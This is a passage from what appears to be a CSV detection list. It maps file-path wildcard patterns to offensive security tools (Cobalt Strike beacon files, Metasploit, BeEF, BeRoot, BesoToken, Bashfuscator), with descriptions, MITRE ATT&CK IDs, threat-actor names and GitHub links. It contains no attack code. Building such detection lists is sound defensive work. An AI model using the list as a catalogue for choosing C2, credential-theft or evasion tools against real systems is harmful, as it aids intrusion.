Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/bash_completion.d/exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/bash_executor/*.go,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/bashexplode/boko*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*/Bashfuscator*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*/Bates.csproj*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook 
unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/batik_svg*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bazarloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/bbaranoff/CVE-2022-0847/*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*/beacon.h,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z 
-*/beacon_202_no_acl.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/beacon_257-objects.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/beacon_compatibility*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/beacon_compatibility.*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*/beacon_funcs/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/beacon_health_check/*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*/beacon_http/*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate 
the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/beacon_notify.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/BeaconChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/beaconhealth.cna*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*/beacon-injection/*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/beacon-object-file*,offensive_tool_keyword,cobaltstrike,Cobaltstrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/realoriginal/beacon-object-file,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/BeaconTool.java*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/beef.git*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef/extensions/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef_bind_shell/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef_common.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beefbind/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beefproject/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/Ben0xA/*,offensive_tool_keyword,Github Username,Github username of known powershell offensive modules and scripts,T1059 - T1027 - T1064 - T1086 - T1191 - T1202,TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Ben0xA,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BeRoot.git*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/beRoot.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - 
T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/beroot.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/BesoToken.cpp*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/BesoToken.exe*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/BesoToken.git*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/bettercap*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks 
reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/bhqc.py -*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,0,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*/BIFFRecordEncryption.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/bin/0d1n*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/bin/AceLdr*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 